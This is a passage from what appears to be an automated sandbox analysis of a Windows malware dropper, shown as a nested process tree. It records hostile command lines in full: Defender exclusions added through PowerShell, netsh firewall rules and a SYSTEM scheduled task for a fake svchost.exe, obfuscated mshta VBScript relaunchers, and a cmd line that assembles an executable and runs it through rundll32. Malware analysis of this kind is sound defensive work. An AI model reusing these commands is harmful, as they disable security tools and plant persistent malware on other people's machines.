                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\P5Z7TM25lUpya_Cfr9Rjf3fZ.exe
                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\P5Z7TM25lUpya_Cfr9Rjf3fZ.exe"
                                                                                                          7⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5028
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\O3RUTSpuRdKv9ijVsOyqae9t.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\O3RUTSpuRdKv9ijVsOyqae9t.exe"
                                                                                                        6⤵
                                                                                                          PID:4316
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im O3RUTSpuRdKv9ijVsOyqae9t.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\O3RUTSpuRdKv9ijVsOyqae9t.exe" & del C:\ProgramData\*.dll & exit
                                                                                                            7⤵
                                                                                                              PID:5536
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                taskkill /im O3RUTSpuRdKv9ijVsOyqae9t.exe /f
                                                                                                                8⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:6468
                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                timeout /t 6
                                                                                                                8⤵
                                                                                                                • Delays execution with timeout.exe
                                                                                                                PID:2132
                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\32yfFuwvqJumdOW0cDcTvsAr.exe
                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\32yfFuwvqJumdOW0cDcTvsAr.exe"
                                                                                                            6⤵
                                                                                                              PID:4780
                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\ugmgN7JYEbquNJPiYmyZmmFM.exe
                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\ugmgN7JYEbquNJPiYmyZmmFM.exe"
                                                                                                              6⤵
                                                                                                                PID:2144
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                  7⤵
                                                                                                                    PID:4240
                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      8⤵
                                                                                                                      • Loads dropped DLL
                                                                                                                      PID:3608
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
                                                                                                                    7⤵
                                                                                                                      PID:588
                                                                                                                    • C:\Windows\System32\netsh.exe
                                                                                                                      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                      7⤵
                                                                                                                        PID:4220
                                                                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                        schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                                        7⤵
                                                                                                                        • Creates scheduled task(s)
                                                                                                                        PID:2968
                                                                                                                      • C:\Windows\System32\netsh.exe
                                                                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                        7⤵
                                                                                                                          PID:1760
                                                                                                                        • C:\Windows\System\svchost.exe
                                                                                                                          "C:\Windows\System\svchost.exe" formal
                                                                                                                          7⤵
                                                                                                                            PID:4404
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                              8⤵
                                                                                                                                PID:5376
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
                                                                                                                                8⤵
                                                                                                                                  PID:5416
                                                                                                                                • C:\Windows\System32\netsh.exe
                                                                                                                                  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                  8⤵
                                                                                                                                    PID:5464
                                                                                                                                  • C:\Windows\System32\netsh.exe
                                                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                    8⤵
                                                                                                                                      PID:5520
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\azisETsUVfo_SyWzlLK7n13D.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\azisETsUVfo_SyWzlLK7n13D.exe"
                                                                                                                                  6⤵
                                                                                                                                    PID:3488
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\azisETsUVfo_SyWzlLK7n13D.exe" & exit
                                                                                                                                      7⤵
                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                      • Checks computer location settings
                                                                                                                                      • Modifies system certificate store
                                                                                                                                      PID:2304
                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                        timeout /t 5
                                                                                                                                        8⤵
                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                        PID:6676
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\OHulEZWwLHhC_nKKp5OtHz1r.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\OHulEZWwLHhC_nKKp5OtHz1r.exe"
                                                                                                                                    6⤵
                                                                                                                                      PID:4384
                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\X3xhtOblD6xupTEpEnGxrNlo.exe
                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\X3xhtOblD6xupTEpEnGxrNlo.exe"
                                                                                                                                      6⤵
                                                                                                                                        PID:3580
                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\X3xhtOblD6xupTEpEnGxrNlo.exe
                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\X3xhtOblD6xupTEpEnGxrNlo.exe"
                                                                                                                                          7⤵
                                                                                                                                            PID:4704
                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\1mvR3cTA9JF3vwfFviBoBAm7.exe
                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\1mvR3cTA9JF3vwfFviBoBAm7.exe"
                                                                                                                                          6⤵
                                                                                                                                            PID:1608
                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                                                                                              "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                                                                                                                              7⤵
                                                                                                                                                PID:1452
                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\REH1ulnSEmMvVXDgONyk485Q.exe
                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\REH1ulnSEmMvVXDgONyk485Q.exe"
                                                                                                                                              6⤵
                                                                                                                                                PID:4352
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4352 -s 664
                                                                                                                                                  7⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:4456
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4352 -s 684
                                                                                                                                                  7⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:4796
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4352 -s 640
                                                                                                                                                  7⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:3948
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4352 -s 704
                                                                                                                                                  7⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:4648
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4352 -s 1184
                                                                                                                                                  7⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:5948
                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\78jOUiieKMU1bCklTogc_TgZ.exe
                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\78jOUiieKMU1bCklTogc_TgZ.exe"
                                                                                                                                                6⤵
                                                                                                                                                  PID:908
                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\Z75iG8DZTRtyUO7HeSCsIRHA.exe
                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\Z75iG8DZTRtyUO7HeSCsIRHA.exe"
                                                                                                                                                  6⤵
                                                                                                                                                    PID:3652
                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                                      7⤵
                                                                                                                                                        PID:4644
                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\5qQVdoGIXwhR7FkabA35TVOu.exe
                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\5qQVdoGIXwhR7FkabA35TVOu.exe"
                                                                                                                                                      6⤵
                                                                                                                                                        PID:1388
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\231765.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\231765.exe"
                                                                                                                                                          7⤵
                                                                                                                                                            PID:4796
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\4840018.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\4840018.exe"
                                                                                                                                                            7⤵
                                                                                                                                                              PID:5172
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:5804
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\3909027.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\3909027.exe"
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:5604
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\4321591.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\4321591.exe"
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:5960
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\8056815.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\8056815.exe"
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:5200
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\8684417.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\8684417.exe"
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:5424
                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                          "C:\Windows\System32\mshta.exe" VbscRIpT: cLosE ( cREaTeOBjeCT ( "wsCriPT.sHELl" ). rUN ( "Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Roaming\8684417.exe"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If """"== """" for %k In ( ""C:\Users\Admin\AppData\Roaming\8684417.exe"" ) do taskkill /F /Im ""%~Nxk"" " , 0 , trUE) )
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:4104
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Roaming\8684417.exe"> kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ& If ""== "" for %k In ( "C:\Users\Admin\AppData\Roaming\8684417.exe" ) do taskkill /F /Im "%~Nxk"
                                                                                                                                                                              9⤵
                                                                                                                                                                                PID:4304
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE
                                                                                                                                                                                  kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ
                                                                                                                                                                                  10⤵
                                                                                                                                                                                    PID:252
                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" VbscRIpT: cLosE ( cREaTeOBjeCT ( "wsCriPT.sHELl" ). rUN ( "Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If ""/P6l3hjJm2mK1sJpxUmLJ""== """" for %k In ( ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" ) do taskkill /F /Im ""%~Nxk"" " , 0 , trUE) )
                                                                                                                                                                                      11⤵
                                                                                                                                                                                        PID:4532
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"> kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ& If "/P6l3hjJm2mK1sJpxUmLJ"== "" for %k In ( "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE" ) do taskkill /F /Im "%~Nxk"
                                                                                                                                                                                          12⤵
                                                                                                                                                                                            PID:6380
                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" VBscrIPT: cLOSE ( cREATEobjeCt ( "WSCRIPt.SheLL" ). ruN ( "C:\Windows\system32\cmd.exe /q /C echo %DatE%cl1V> 8KyK.ZNp & Echo | sET /P = ""MZ"" > hXUPL.XH & CoPY /b /Y HXUPL.XH + QR7i5Ur.BRU + wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM & StArT control .\GKq1GTV.ZnM " , 0 , TrUe ) )
                                                                                                                                                                                          11⤵
                                                                                                                                                                                            PID:6456
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /q /C echo ÚtE%cl1V> 8KyK.ZNp & Echo | sET /P = "MZ" >hXUPL.XH & CoPY /b /Y HXUPL.XH +QR7i5Ur.BRU + wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM& StArT control .\GKq1GTV.ZnM
                                                                                                                                                                                              12⤵
                                                                                                                                                                                                PID:4412
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" Echo "
                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                    PID:7040
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>hXUPL.XH"
                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                      PID:7076
                                                                                                                                                                                                    • C:\Windows\SysWOW64\control.exe
                                                                                                                                                                                                      control .\GKq1GTV.ZnM
                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                        PID:5140
                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                          "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\GKq1GTV.ZnM
                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                            PID:1564
                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                    taskkill /F /Im "8684417.exe"
                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                    PID:4996
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\1606204.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\1606204.exe"
                                                                                                                                                                                              7⤵
                                                                                                                                                                                                PID:5500
                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\9Ti3WwZrPJfJGx54Pu4mxcc3.exe
                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\9Ti3WwZrPJfJGx54Pu4mxcc3.exe"
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:1908
                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\r1tTw0ZGduzPiiVvL3FFlGl3.exe
                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\r1tTw0ZGduzPiiVvL3FFlGl3.exe"
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:4348
                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\tuGqeVl_4wuOg1hQgrK36OnP.exe
                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\tuGqeVl_4wuOg1hQgrK36OnP.exe"
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                    PID:4680
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c Sun15f67075f27a2b5b.exe
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                PID:368
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS440CA0B6\Sun15f67075f27a2b5b.exe
                                                                                                                                                                                                  Sun15f67075f27a2b5b.exe
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                  PID:3676
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c Sun15901f2f025e.exe
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                PID:1756
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS440CA0B6\Sun15901f2f025e.exe
                                                                                                                                                                                                  Sun15901f2f025e.exe
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                  PID:1988
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:2508
                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                        taskkill /f /im chrome.exe
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                        PID:4496
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Sun1577c3e159a3e3815.exe /mixone
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                  PID:4036
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS440CA0B6\Sun1577c3e159a3e3815.exe
                                                                                                                                                                                                    Sun1577c3e159a3e3815.exe /mixone
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:3124
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 660
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                      PID:4400
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 676
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      PID:4728
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 680
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      PID:4956
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 804
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      PID:4124
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 860
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      PID:4472
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 848
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      PID:3620
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 1160
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      PID:2820
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 1336
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      PID:4796
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 1376
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      PID:4964
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Sun159ff1acacf.exe
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                  PID:2448
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS440CA0B6\Sun159ff1acacf.exe
                                                                                                                                                                                                    Sun159ff1acacf.exe
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                    PID:3248
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Sun15f1b1f8c669.exe
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:1336
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS440CA0B6\Sun15f1b1f8c669.exe
                                                                                                                                                                                                      Sun15f1b1f8c669.exe
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      PID:836
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Sun152bea652bd7232.exe
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:1952
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS440CA0B6\Sun152bea652bd7232.exe
                                                                                                                                                                                                        Sun152bea652bd7232.exe
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:2220
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Sun1507db358fce61c0b.exe
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:816
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS440CA0B6\Sun1507db358fce61c0b.exe
                                                                                                                                                                                                          Sun1507db358fce61c0b.exe
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                          PID:504
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 472
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                        PID:3148
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Sun152e52d07b74d9b5.exe
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:2704
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Sun158d8ef840.exe
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                          PID:2396
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS440CA0B6\Sun152e52d07b74d9b5.exe
                                                                                                                                                                                                    Sun152e52d07b74d9b5.exe
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                    PID:3940
                                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 3940 -s 1760
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                      PID:1968
                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS440CA0B6\Sun158d8ef840.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS440CA0B6\Sun158d8ef840.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:2820
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS440CA0B6\Sun158d8ef840.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS440CA0B6\Sun158d8ef840.exe" ) do taskkill /F -Im "%~NxU"
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:2164
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\09xU.exE
                                                                                                                                                                                                            09xU.EXE -pPtzyIkqLZoCarb5ew
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            PID:1020
                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:3236
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                    PID:4132
                                                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
